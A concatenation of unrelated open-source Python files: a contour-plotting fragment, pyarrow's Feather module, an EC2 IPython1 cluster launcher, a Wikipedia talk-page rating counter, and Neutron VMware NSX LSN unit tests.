az = opt.dataloc[:,1].reshape(img.shape)
el = opt.dataloc[:,2].reshape(img.shape)
elif isinstance(opt,np.ndarray):
img = opt
else:
raise NotImplementedError('not sure what your opt array {} is'.format(type(opt)))
assert img.ndim==2, 'just one image please'
assert img.shape==az.shape==el.shape,'do you need to reshape your az/el into 2-D like image?'
fg,ax = plt.subplots(1,2,figsize=(12,6))
for a,q,t in zip(ax,(az,el),('azimuth','elevation')):
a.imshow(img,origin='lower',interpolation='none',cmap='gray')
c=a.contour(q)
a.clabel(c, inline=1,fmt='%0.1f')
a.set_title(t)
a.grid(False)
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import six
from pyarrow.pandas_compat import _pandas_api # noqa
from pyarrow.lib import FeatherError # noqa
from pyarrow.lib import Table, concat_tables
import pyarrow.lib as ext
def _check_pandas_version():
if _pandas_api.loose_version < '0.17.0':
raise ImportError("feather requires pandas >= 0.17.0")
class FeatherReader(ext.FeatherReader):
def __init__(self, source):
_check_pandas_version()
self.source = source
self.open(source)
def read_table(self, columns=None):
if columns is None:
return self._read()
column_types = [type(column) for column in columns]
if all(map(lambda t: t == int, column_types)):
return self._read_indices(columns)
elif all(map(lambda t: t == str, column_types)):
return self._read_names(columns)
column_type_names = [t.__name__ for t in column_types]
raise TypeError("Columns must be indices or names. "
"Got columns {} of types {}"
.format(columns, column_type_names))
def read_pandas(self, columns=None, use_threads=True):
return self.read_table(columns=columns).to_pandas(
use_threads=use_threads)
def check_chunked_overflow(col):
if col.data.num_chunks == 1:
return
if col.type in (ext.binary(), ext.string()):
raise ValueError("Column '{0}' exceeds 2GB maximum capacity of "
"a Feather binary column. This restriction may be "
"lifted in the future".format(col.name))
else:
# TODO(wesm): Not sure when else this might be reached
raise ValueError("Column '{0}' of type {1} was chunked on conversion "
"to Arrow and cannot be currently written to "
"Feather format".format(col.name, str(col.type)))
class FeatherWriter(object):
def __init__(self, dest):
_check_pandas_version()
self.dest = dest
self.writer = ext.FeatherWriter()
self.writer.open(dest)
def write(self, df):
if isinstance(df, _pandas_api.pd.SparseDataFrame):
df = df.to_dense()
if not df.columns.is_unique:
raise ValueError("cannot serialize duplicate column names")
# TODO(wesm): Remove this length check, see ARROW-1732
if len(df.columns) > 0:
table = Table.from_pandas(df, preserve_index=False)
for i, name in enumerate(table.schema.names):
col = table[i]
check_chunked_overflow(col)
self.writer.write_array(name, col.data.chunk(0))
self.writer.close()
class FeatherDataset(object):
"""
Encapsulates details of reading a list of Feather files.
Parameters
----------
path_or_paths : List[str]
A list of file names
validate_schema : boolean, default True
Check that individual file schemas are all the same / compatible
"""
def __init__(self, path_or_paths, validate_schema=True):
_check_pandas_version()
self.paths = path_or_paths
self.validate_schema = validate_schema
def read_table(self, columns=None):
"""
Read multiple feather files as a single pyarrow.Table
Parameters
----------
columns : List[str]
Names of columns to read from the file
Returns
-------
pyarrow.Table
Content of the file as a table (of columns)
"""
_fil = FeatherReader(self.paths[0]).read_table(columns=columns)
self._tables = [_fil]
self.schema = _fil.schema
for fil in self.paths[1:]:
fil_table = FeatherReader(fil).read_table(columns=columns)
if self.validate_schema:
self.validate_schemas(fil, fil_table)
self._tables.append(fil_table)
return concat_tables(self._tables)
def validate_schemas(self, piece, table):
if not self.schema.equals(table.schema):
raise ValueError('Schema in {0!s} was different. \n'
'{1!s}\n\nvs\n\n{2!s}'
.format(piece, self.schema,
table.schema))
def read_pandas(self, columns=None, use_threads=True):
"""
        Read multiple Feather files as a single pandas DataFrame
Parameters
----------
columns : List[str]
Names of columns to read from the file
use_threads : boolean, default True
Use multiple threads when converting to pandas
Returns
-------
pandas.DataFrame
Content of the file as a pandas DataFrame (of columns)
"""
return self.read_table(columns=columns).to_pandas(
use_threads=use_threads)
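# Example (sketch) of reading a multi-file dataset; the file names are
# hypothetical and the parts must share a compatible schema:
#   dataset = FeatherDataset(['part-0.feather', 'part-1.feather'])
#   df = dataset.read_pandas(columns=['a', 'b'])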
def write_feather(df, dest):
"""
Write a pandas.DataFrame to Feather format
Parameters
----------
df : pandas.DataFrame
dest : string
Local file path
"""
writer = FeatherWriter(dest)
try:
writer.write(df)
except Exception:
# Try to make sure the resource is closed
import gc
writer = None
gc.collect()
if isinstance(dest, six.string_types):
try:
os.remove(dest)
except os.error:
pass
raise
def read_feather(source, columns=None, use_threads=True):
"""
Read a pandas.DataFrame from Feather format
Parameters
----------
source : string file path, or file-like object
columns : sequence, optional
Only read a specific set of columns. If not provided, all columns are
read
use_threads: bool, default True
Whether to parallelize reading using multiple threads
Returns
-------
df : pandas.DataFrame
"""
reader = FeatherReader(source)
return reader.read_pandas(columns=columns, use_threads=use_threads)
def read_table(source, columns=None):
"""
Read a pyarrow.Table from Feather format
Parameters
----------
source : string file path, or file-like object
columns : sequence, optional
Only read a specific set of columns. If not provided, all columns are
read
Returns
-------
table : pyarrow.Table
"""
reader = FeatherReader(source)
return reader.read_table(columns=columns)
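# Example (sketch) of a round trip with the helpers above:
#   import pandas as pd
#   df = pd.DataFrame({'a': [1, 2, 3]})
#   write_feather(df, '/tmp/example.feather')
#   df2 = read_feather('/tmp/example.feather')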
|
|
import sys, os, time
import ConfigParser
from itertools import groupby
import ipython1.kernel.api as kernel
import boto
# options required in the config file
required_config_options = [
('access_key', 'Please specify your AWS access key ID.'),
('secret_access_key', 'Please specify your AWS secret access key.'),
('ami', 'Please specify the AMI to use for the controller and engines.'),
('key_name', 'Please specify the key_name to use with the EC2 instances.'),
('credential', 'Please specify the ssh credential file.'),
]
class EC2Cluster:
"""
* starts desired number of EC2 instances
* starts controller on first instance
* starts engines on all other instances
* includes methods for:
* creating and terminating cluster
* creating RemoteController and TaskController from cluster
states:
* aws_connected: have connection to AWS
* instances_reserved
* instances_running
* cluster_ready: instances are running and IPython1 controller/engines setup
"""
def __init__(self, configfile, instances=[]):
self.config = self._check_config(configfile)
self.conn = boto.connect_ec2(
self.config['access_key'],
self.config['secret_access_key']
)
self._state = ['aws_connected']
self.instances = instances if instances else []
def _check_config(self, configfile):
configp = ConfigParser.SafeConfigParser()
configp.read(configfile)
config = dict(configp.items('EC2'))
for key, error in required_config_options:
if key not in config:
print error
sys.exit(1)
return config
def _wait_till_instances_in_state(self, waitingfor, resulting_state, sleepfor=10):
print "Waiting till all instances are %s. Will check every %s seconds." % (waitingfor, sleepfor)
print "Hit Ctrl-C to stop waiting."
while True:
statuses = [i.update() for i in self.instances]
if all(status == waitingfor for status in statuses):
print "All instances %s" % waitingfor
self._state.append(resulting_state)
return
else:
print "Not all instances are %s" % waitingfor
statuses.sort()
                for statustype, group in groupby(statuses, lambda x: x):
                    print "\t%s: %s instances" % (statustype, len(list(group)))
time.sleep(sleepfor)
def wait_till_instances_running(self, sleepfor=10):
self._wait_till_instances_in_state('running', 'instances_running', sleepfor)
def wait_till_instances_terminated(self, sleepfor=10):
self._wait_till_instances_in_state('terminated', 'instances_terminated', sleepfor)
def create_instances(self, min_count=1, max_count=None):
# if max not specified, it's the same as the min
max_count = max_count or min_count
# reserve instances
print "Reserving EC2 instances."
self.reservation = self.conn.run_instances(
self.config['ami'],
min_count, max_count,
self.config['key_name'],
)
self._state.append('instances_reserved')
self.instances = self.reservation.instances
self.wait_till_instances_running()
print "Waiting for firewall ports to open up (10 secs)"
time.sleep(10)
print "Trying to connect to worker nodes using ssh"
self._check_ssh_connection()
def _check_ssh_connection(self):
instances = [i for i in self.instances]
while instances:
for i in instances:
time.sleep(1) # so we're not bombarding the servers
if 0 == self.remote(i, "ls /"):
instances.remove(i)
def start_ipython1(self, engine_on_controller=False):
if not 'instances_running' in self._state:
print "Not all instances are running."
return False
if not hasattr(self, 'instances'):
print "Create EC2 instances before starting cluster."
return False
print "Starting ipython1 controller/engines on running instances"
# redirect stdin, stdout and stderr on remote processes so ssh terminates.
# we could use 'ssh -f' but that will fork ssh in the background
# and on large clusters that could mean many ssh background procs
cmd_postfix = "</dev/null >&0 2>&0 &"
# run ipcontroller on the first controller instance
controller_ip = self.instances[0].public_dns_name
controller_port = kernel.defaultRemoteController[1]
print "Starting controller on %s" % controller_ip
self.remote(
host = self.instances[0],
cmd = "nohup /usr/local/bin/ipcontroller -l /mnt/ipcontroller_ %s" % cmd_postfix,
)
print "Waiting for controller to start (6 secs)"
time.sleep(6)
# run engine on the same instance as controller?
engine_instances = self.instances[1:] if not engine_on_controller else self.instances
# run ipengine on selected instances
for inst in engine_instances:
print "Starting engine on %s" % inst.public_dns_name
self.remote(
host = inst,
cmd = "nohup /usr/local/bin/ipengine --controller-ip=%s -l /mnt/ipengine_ %s" % (controller_ip, cmd_postfix),
)
time.sleep(1) # so we don't bombard the controller..
print "-"*70
print "Ipython1 controller running on %s:%s" % (controller_ip, controller_port)
print "Type the following to login to controller:"
print "ssh -i %s root@%s" % (self.config['credential'], controller_ip)
self._state.append('ipython1_running')
time.sleep(6) # waiting for cluster to be setup
return True
def reboot_instances(self):
print "Rebooting all instances"
for inst in self.instances:
inst.reboot()
self._state = ['instances_reserved']
self.wait_till_instances_running()
def terminate_instances(self):
for i in self.instances:
i.stop()
self.wait_till_instances_terminated()
def authorize_access_to_controller(self, from_ip):
ports = [kernel.defaultRemoteController[1], kernel.defaultTaskController[1]]
for port in ports:
print "Authorizing access for group default for port %s from IP %s" % (port, from_ip)
self.conn.authorize_security_group('default', ip_protocol='tcp', from_port=port,
to_port=port, cidr_ip=from_ip)
@property
def remote_controller(self):
return kernel.RemoteController((
self.instances[0].public_dns_name,
kernel.defaultRemoteController[1]
))
@property
def task_controller(self):
return kernel.TaskController((
self.instances[0].public_dns_name,
kernel.defaultTaskController[1]
))
@property
def task_controller_url(self):
return "%s:%s" % (self.instances[0].public_dns_name,
kernel.defaultTaskController[1])
@property
def remote_controller_url(self):
return "%s:%s" % (self.instances[0].public_dns_name,
kernel.defaultRemoteController[1])
# from Peter Skomoroch's ec2-mpi-config.py (see http://datawrangling.com)
def remote(self, host, cmd='scp', src=None, dest=None, test=False):
""" Run a command on remote machine (or copy files) using ssh.
@param host: boto ec2 instance, ip address or dns name
"""
d = {
'cmd':cmd,
'src':src,
'dest':dest,
'host':getattr(host, 'public_dns_name', str(host)),
'switches': ''
}
d['switches'] += " -i %s " % self.config['credential']
if cmd == 'scp':
template = '%(cmd)s %(switches)s -o "StrictHostKeyChecking no" %(src)s root@%(host)s:%(dest)s'
else:
template = 'ssh %(switches)s -o "StrictHostKeyChecking no" root@%(host)s "%(cmd)s" '
cmdline = template % d
print "Trying: ", cmdline
if not test:
return os.system(cmdline)
def remote_all(self, cmd='scp', src=None, dest=None, test=False):
for i in self.instances:
self.remote(i.public_dns_name, cmd, src, dest, test)
def tofile(self, filename):
f = file(filename, 'w')
f.writelines(inst.id + "\n" for inst in self.instances)
f.close()
def fromfile(self, filename):
def _instance(id):
inst = boto.ec2.instance.Instance(self.conn)
inst.id = id
inst.update()
return inst
self.instances = [_instance(id[:-1]) for id in file(filename).readlines()]
# USAGE
#ec2 = EC2Cluster()
#ec2.create_instances()
#ec2.start_ipython1()
#tc = ec2.task_controller
#ec2.terminate_instances()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Script that processes a dataset of rated articles and checks each article's
talk page in order to verify how many templates with importance ratings are
on their talk pages.
Copyright (c) 2017 Morten Wang
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import os
import re
import logging
import MySQLdb
import pywikibot
from pywikibot.pagegenerators import PreloadingGenerator, PagesFromTitlesGenerator
import mwparserfromhell as mwp
class TalkPage:
def __init__(self, page_id):
self.page_id = page_id
self.page_title = ''
self.num_ratings = 0
class TalkpageProcessor:
def __init__(self):
## Language code of the Wikipedia edition we're processing for
self.lang = 'en'
## Do 10 at a time in case the talk page is huge
self.slice_size = 10
self.db_conf = "~/replica.my.cnf"
self.db_server = "enwiki.labsdb"
self.db_name = "enwiki_p"
self.db_conn = None
self.db_cursor = None
## Names of templates with a "priority" parameter.
self.priority_templates = []
def db_connect(self):
'''
Connect to the database. Returns True if successful.
'''
self.db_conn = None
self.db_cursor = None
try:
self.db_conn = MySQLdb.connect(db=self.db_name,
host=self.db_server,
read_default_file=os.path.expanduser(self.db_conf))
self.db_cursor = self.db_conn.cursor(MySQLdb.cursors.SSDictCursor)
except MySQLdb.Error as e:
logging.error('Unable to connect to database')
            logging.error('{} : {}'.format(e.args[0], e.args[1]))
if self.db_conn:
return(True)
return(False)
def db_disconnect(self):
'''Close our database connections.'''
try:
self.db_cursor.close()
self.db_conn.close()
        except Exception:
pass
return()
def process_template(self, template):
'''
Process the template and return a list of any valid ratings
found in it.
'''
## Valid importance ratings
VALID_RATINGS = set(['top','high','mid','low'])
## There are several cases where an importance rating might be found:
##
## 1: parameter named importance
## 2: sub-project importance parameters (e.g. WikiProject Africa
## uses a "Djibouti-importance" parameter)
## 3: sub-project priority parameters (e.g. WikiProject Biography
## uses a "filmbio-priority" parameter)
##
## Note that some WikiProjects use a "priority" parameter. We will
## ignore that parameter as we have yet to see an example where it
## results in a subsequent categorization of the article. As we're
## interested in knowing about them, we'll store the template names
## and write them out at the end.
ratings = []
if template.has('priority'):
self.priority_templates.append(str(template.name.strip_code()))
elif template.has('importance'):
rating = str(template.get('importance').value.strip_code()).strip().lower()
if rating in VALID_RATINGS:
ratings.append(rating)
for param in template.params:
p_name = str(param.name.strip_code()).strip().lower()
## This regex is deliberately liberal because some projects
## use things like "&" in the parameter name.
if re.search('.+-(priority|importance)$', p_name):
rating = str(param.value.strip_code()).strip().lower()
if rating in VALID_RATINGS:
ratings.append(rating)
return(ratings)
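    ## Example (sketch): a banner such as
    ## {{WikiProject Africa|importance=High|Djibouti-importance=Low}}
    ## makes this method return ['high', 'low'].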
def check_talkpages(self, input_filename, output_filename,
id_col_idx):
'''
Go through all the pages in the given dataset of unanimously rated
articles and check their talk pages in order to establish the number
of actual importance ratings they have.
:param input_filename: path to the TSV dataset
:type input_filename: str
:param output_filename: path to output TSV dataset
:type output_filename: str
:param id_col_idx: zero-based index of the page ID column
:type id_col_idx: int
'''
## SQL query to get page titles based on page IDs
title_query = '''SELECT page_id, page_title
FROM page
WHERE page_id IN ({idlist})'''
site = pywikibot.Site(self.lang)
## Mapping page IDs and titles to talk page data
id_page_map = {}
title_page_map = {}
## read in the dataset
with open(input_filename, 'r', encoding='utf-8') as infile:
infile.readline() # skip header
for line in infile:
cols = line.rstrip('\n').split('\t')
page_id = cols[id_col_idx]
id_page_map[page_id] = TalkPage(page_id)
## find the current page title of all the pages
## (ideally none of them should have incorrect page IDs)
if not self.db_connect():
logging.error('unable to connect to database')
return()
pageids = list(id_page_map.keys())
i = 0
while i < len(pageids):
subset = pageids[i:i+self.slice_size]
self.db_cursor.execute(title_query.format(
idlist=','.join(subset)))
for row in self.db_cursor.fetchall():
page_id = str(row['page_id'])
page_title = row['page_title'].decode('utf-8').replace('_', ' ')
id_page_map[page_id].page_title = page_title
title_page_map[page_title] = id_page_map[page_id]
# ok, iterate
i += self.slice_size
self.db_disconnect()
talkpage_titles = ["Talk:{}".format(title)
for title in title_page_map.keys()]
for talkpage in PreloadingGenerator(
PagesFromTitlesGenerator(talkpage_titles),
step=self.slice_size):
logging.info('processing {}'.format(talkpage.title()))
## The templates are at the top of the page, so if it's a long
## page, truncate to speed up parsing.
try:
content = talkpage.get()
            except pywikibot.exceptions.IsRedirectPage:
logging.warning('{} is a redirect'.format(talkpage.title()))
continue
if len(content) > 8*1024:
content = content[:8*1024]
parsed_page = mwp.parse(content)
for template in parsed_page.filter_templates(recursive=True):
ratings = self.process_template(template)
## Sanity check
                if len(set(ratings)) > 1:
logging.warning('{} has non-unanimous importance ratings'.format(talkpage.title()))
else:
title_page_map[talkpage.title(withNamespace=False)].num_ratings += len(ratings)
## Write out all pages with priority templates, if any
if self.priority_templates:
print('We found the following templates with a "priority" parameter')
for template in self.priority_templates:
print('* {}'.format(template))
print('')
## Write out a dataset of page ID and num ratings
with open(output_filename, 'w', encoding='utf-8') as outfile:
outfile.write('talk_page_id\ttalk_page_title\tnum_wpratings\n')
for (page_id, page_data) in id_page_map.items():
outfile.write('{0.page_id}\t{0.page_title}\t{0.num_ratings}\n'.format(page_data))
## ok, done
return()
def main():
import argparse
cli_parser = argparse.ArgumentParser(
description="script to check talk pages for importance ratings"
)
cli_parser.add_argument("input_filename", type=str,
help="path to the input TSV dataset")
cli_parser.add_argument("output_filename", type=str,
help="path to the output TSV extended dataset")
cli_parser.add_argument("id_col_idx", type=int,
help="zero-based index of the page ID column")
# Verbosity option
cli_parser.add_argument('-v', '--verbose', action='store_true',
help='write informational output')
args = cli_parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.INFO)
processor = TalkpageProcessor()
processor.check_talkpages(args.input_filename, args.output_filename,
args.id_col_idx)
return()
if __name__ == '__main__':
main()
|
|
# Copyright 2013 VMware, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import mock
from neutron.common import exceptions
from neutron.plugins.vmware.api_client import exception as api_exc
from neutron.plugins.vmware.common import exceptions as nsx_exc
from neutron.plugins.vmware.common import utils
from neutron.plugins.vmware.nsxlib import lsn as lsnlib
from neutron.tests import base
class LSNTestCase(base.BaseTestCase):
def setUp(self):
super(LSNTestCase, self).setUp()
self.mock_request_p = mock.patch.object(lsnlib, 'do_request')
self.mock_request = self.mock_request_p.start()
self.cluster = mock.Mock()
self.cluster.default_service_cluster_uuid = 'foo'
self.addCleanup(self.mock_request_p.stop)
def test_service_cluster_None(self):
self.mock_request.return_value = None
expected = lsnlib.service_cluster_exists(None, None)
self.assertFalse(expected)
def test_service_cluster_found(self):
self.mock_request.return_value = {
"results": [
{
"_href": "/ws.v1/service-cluster/foo_uuid",
"display_name": "foo_name",
"uuid": "foo_uuid",
"tags": [],
"_schema": "/ws.v1/schema/ServiceClusterConfig",
"gateways": []
}
],
"result_count": 1
}
expected = lsnlib.service_cluster_exists(None, 'foo_uuid')
self.assertTrue(expected)
def test_service_cluster_not_found(self):
self.mock_request.side_effect = exceptions.NotFound()
expected = lsnlib.service_cluster_exists(None, 'foo_uuid')
self.assertFalse(expected)
def test_lsn_for_network_create(self):
net_id = "foo_network_id"
tags = utils.get_tags(n_network_id=net_id)
obj = {"service_cluster_uuid": "foo", "tags": tags}
lsnlib.lsn_for_network_create(self.cluster, net_id)
self.mock_request.assert_called_once_with(
"POST", "/ws.v1/lservices-node",
json.dumps(obj), cluster=self.cluster)
def test_lsn_for_network_get(self):
net_id = "foo_network_id"
lsn_id = "foo_lsn_id"
self.mock_request.return_value = {
"results": [{"uuid": "foo_lsn_id"}],
"result_count": 1
}
result = lsnlib.lsn_for_network_get(self.cluster, net_id)
self.assertEqual(lsn_id, result)
self.mock_request.assert_called_once_with(
"GET",
("/ws.v1/lservices-node?fields=uuid&tag_scope="
"n_network_id&tag=%s" % net_id),
cluster=self.cluster)
def test_lsn_for_network_get_none(self):
net_id = "foo_network_id"
self.mock_request.return_value = {
"results": [{"uuid": "foo_lsn_id1"}, {"uuid": "foo_lsn_id2"}],
"result_count": 2
}
result = lsnlib.lsn_for_network_get(self.cluster, net_id)
self.assertIsNone(result)
def test_lsn_for_network_get_raise_not_found(self):
net_id = "foo_network_id"
self.mock_request.return_value = {
"results": [], "result_count": 0
}
self.assertRaises(exceptions.NotFound,
lsnlib.lsn_for_network_get,
self.cluster, net_id)
def test_lsn_delete(self):
lsn_id = "foo_id"
lsnlib.lsn_delete(self.cluster, lsn_id)
self.mock_request.assert_called_once_with(
"DELETE",
"/ws.v1/lservices-node/%s" % lsn_id, cluster=self.cluster)
def _test_lsn_port_host_entries_update(self, lsn_type, hosts_data):
lsn_id = 'foo_lsn_id'
lsn_port_id = 'foo_lsn_port_id'
lsnlib.lsn_port_host_entries_update(
self.cluster, lsn_id, lsn_port_id, lsn_type, hosts_data)
self.mock_request.assert_called_once_with(
'PUT',
'/ws.v1/lservices-node/%s/lport/%s/%s' % (lsn_id,
lsn_port_id,
lsn_type),
json.dumps({'hosts': hosts_data}),
cluster=self.cluster)
def test_lsn_port_dhcp_entries_update(self):
hosts_data = [{"ip_address": "11.22.33.44",
"mac_address": "aa:bb:cc:dd:ee:ff"},
{"ip_address": "44.33.22.11",
"mac_address": "ff:ee:dd:cc:bb:aa"}]
self._test_lsn_port_host_entries_update("dhcp", hosts_data)
def test_lsn_port_metadata_entries_update(self):
hosts_data = [{"ip_address": "11.22.33.44",
"device_id": "foo_vm_uuid"}]
self._test_lsn_port_host_entries_update("metadata-proxy", hosts_data)
def test_lsn_port_create(self):
port_data = {
"ip_address": "1.2.3.0/24",
"mac_address": "aa:bb:cc:dd:ee:ff",
"subnet_id": "foo_subnet_id"
}
port_id = "foo_port_id"
self.mock_request.return_value = {"uuid": port_id}
lsn_id = "foo_lsn_id"
result = lsnlib.lsn_port_create(self.cluster, lsn_id, port_data)
self.assertEqual(result, port_id)
tags = utils.get_tags(n_subnet_id=port_data["subnet_id"],
n_mac_address=port_data["mac_address"])
port_obj = {
"ip_address": port_data["ip_address"],
"mac_address": port_data["mac_address"],
"type": "LogicalServicesNodePortConfig",
"tags": tags
}
self.mock_request.assert_called_once_with(
"POST", "/ws.v1/lservices-node/%s/lport" % lsn_id,
json.dumps(port_obj), cluster=self.cluster)
def test_lsn_port_delete(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_port_id"
lsnlib.lsn_port_delete(self.cluster, lsn_id, lsn_port_id)
self.mock_request.assert_called_once_with(
"DELETE",
"/ws.v1/lservices-node/%s/lport/%s" % (lsn_id, lsn_port_id),
cluster=self.cluster)
def test_lsn_port_get_with_filters(self):
lsn_id = "foo_lsn_id"
port_id = "foo_port_id"
filters = {"tag": "foo_tag", "tag_scope": "foo_scope"}
self.mock_request.return_value = {
"results": [{"uuid": port_id}],
"result_count": 1
}
result = lsnlib._lsn_port_get(self.cluster, lsn_id, filters)
self.assertEqual(result, port_id)
self.mock_request.assert_called_once_with(
"GET",
("/ws.v1/lservices-node/%s/lport?fields=uuid&tag_scope=%s&"
"tag=%s" % (lsn_id, filters["tag_scope"], filters["tag"])),
cluster=self.cluster)
def test_lsn_port_get_with_filters_return_none(self):
self.mock_request.return_value = {
"results": [{"uuid": "foo1"}, {"uuid": "foo2"}],
"result_count": 2
}
result = lsnlib._lsn_port_get(self.cluster, "lsn_id", None)
self.assertIsNone(result)
def test_lsn_port_get_with_filters_raises_not_found(self):
self.mock_request.return_value = {"results": [], "result_count": 0}
self.assertRaises(exceptions.NotFound,
lsnlib._lsn_port_get,
self.cluster, "lsn_id", None)
def test_lsn_port_info_get(self):
self.mock_request.return_value = {
"tags": [
{"scope": "n_mac_address", "tag": "fa:16:3e:27:fd:a0"},
{"scope": "n_subnet_id", "tag": "foo_subnet_id"},
],
"mac_address": "aa:bb:cc:dd:ee:ff",
"ip_address": "0.0.0.0/0",
"uuid": "foo_lsn_port_id"
}
result = lsnlib.lsn_port_info_get(
self.cluster, 'foo_lsn_id', 'foo_lsn_port_id')
self.mock_request.assert_called_once_with(
'GET', '/ws.v1/lservices-node/foo_lsn_id/lport/foo_lsn_port_id',
cluster=self.cluster)
self.assertIn('subnet_id', result)
self.assertIn('mac_address', result)
def test_lsn_port_info_get_raise_not_found(self):
self.mock_request.side_effect = exceptions.NotFound
self.assertRaises(exceptions.NotFound,
lsnlib.lsn_port_info_get,
self.cluster, mock.ANY, mock.ANY)
def test_lsn_port_plug_network(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
lswitch_port_id = "foo_lswitch_port_id"
lsnlib.lsn_port_plug_network(
self.cluster, lsn_id, lsn_port_id, lswitch_port_id)
self.mock_request.assert_called_once_with(
"PUT",
("/ws.v1/lservices-node/%s/lport/%s/"
"attachment") % (lsn_id, lsn_port_id),
json.dumps({"peer_port_uuid": lswitch_port_id,
"type": "PatchAttachment"}),
cluster=self.cluster)
def test_lsn_port_plug_network_raise_conflict(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
lswitch_port_id = "foo_lswitch_port_id"
self.mock_request.side_effect = api_exc.Conflict
self.assertRaises(
nsx_exc.LsnConfigurationConflict,
lsnlib.lsn_port_plug_network,
self.cluster, lsn_id, lsn_port_id, lswitch_port_id)
def _test_lsn_port_dhcp_configure(
self, lsn_id, lsn_port_id, is_enabled, opts):
lsnlib.lsn_port_dhcp_configure(
self.cluster, lsn_id, lsn_port_id, is_enabled, opts)
opt_array = ["%s=%s" % (key, val) for key, val in opts.iteritems()]
self.mock_request.assert_has_calls([
mock.call("PUT", "/ws.v1/lservices-node/%s/dhcp" % lsn_id,
json.dumps({"enabled": is_enabled}),
cluster=self.cluster),
mock.call("PUT",
("/ws.v1/lservices-node/%s/"
"lport/%s/dhcp") % (lsn_id, lsn_port_id),
json.dumps({"options": {"options": opt_array}}),
cluster=self.cluster)
])
def test_lsn_port_dhcp_configure_empty_opts(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
is_enabled = False
opts = {}
self._test_lsn_port_dhcp_configure(
lsn_id, lsn_port_id, is_enabled, opts)
def test_lsn_port_dhcp_configure_with_opts(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
is_enabled = True
opts = {"opt1": "val1", "opt2": "val2"}
self._test_lsn_port_dhcp_configure(
lsn_id, lsn_port_id, is_enabled, opts)
def _test_lsn_metadata_configure(
self, lsn_id, is_enabled, opts, expected_opts):
lsnlib.lsn_metadata_configure(
self.cluster, lsn_id, is_enabled, opts)
lsn_obj = {"enabled": is_enabled}
lsn_obj.update(expected_opts)
self.mock_request.assert_has_calls([
mock.call("PUT",
"/ws.v1/lservices-node/%s/metadata-proxy" % lsn_id,
json.dumps(lsn_obj),
cluster=self.cluster),
])
def test_lsn_port_metadata_configure_empty_secret(self):
lsn_id = "foo_lsn_id"
is_enabled = True
opts = {
"metadata_server_ip": "1.2.3.4",
"metadata_server_port": "8775"
}
expected_opts = {
"metadata_server_ip": "1.2.3.4",
"metadata_server_port": "8775",
"misc_options": []
}
self._test_lsn_metadata_configure(
lsn_id, is_enabled, opts, expected_opts)
def test_lsn_metadata_configure_with_secret(self):
lsn_id = "foo_lsn_id"
is_enabled = True
opts = {
"metadata_server_ip": "1.2.3.4",
"metadata_server_port": "8775",
"metadata_proxy_shared_secret": "foo_secret"
}
expected_opts = {
"metadata_server_ip": "1.2.3.4",
"metadata_server_port": "8775",
"misc_options": ["metadata_proxy_shared_secret=foo_secret"]
}
self._test_lsn_metadata_configure(
lsn_id, is_enabled, opts, expected_opts)
def _test_lsn_port_host_action(
self, lsn_port_action_func, extra_action, action, host):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
lsn_port_action_func(self.cluster, lsn_id, lsn_port_id, host)
self.mock_request.assert_called_once_with(
"POST",
("/ws.v1/lservices-node/%s/lport/"
"%s/%s?action=%s") % (lsn_id, lsn_port_id, extra_action, action),
json.dumps(host), cluster=self.cluster)
def test_lsn_port_dhcp_host_add(self):
host = {
"ip_address": "1.2.3.4",
"mac_address": "aa:bb:cc:dd:ee:ff"
}
self._test_lsn_port_host_action(
lsnlib.lsn_port_dhcp_host_add, "dhcp", "add_host", host)
def test_lsn_port_dhcp_host_remove(self):
host = {
"ip_address": "1.2.3.4",
"mac_address": "aa:bb:cc:dd:ee:ff"
}
self._test_lsn_port_host_action(
lsnlib.lsn_port_dhcp_host_remove, "dhcp", "remove_host", host)
def test_lsn_port_metadata_host_add(self):
host = {
"ip_address": "1.2.3.4",
"instance_id": "foo_instance_id"
}
self._test_lsn_port_host_action(lsnlib.lsn_port_metadata_host_add,
"metadata-proxy", "add_host", host)
def test_lsn_port_metadata_host_remove(self):
host = {
"ip_address": "1.2.3.4",
"instance_id": "foo_instance_id"
}
self._test_lsn_port_host_action(lsnlib.lsn_port_metadata_host_remove,
"metadata-proxy", "remove_host", host)
|
|
import argparse
from pathlib import Path
from methods import Method
from models import SampleCollection, Experiment
from declarative_parser import Parser, Argument
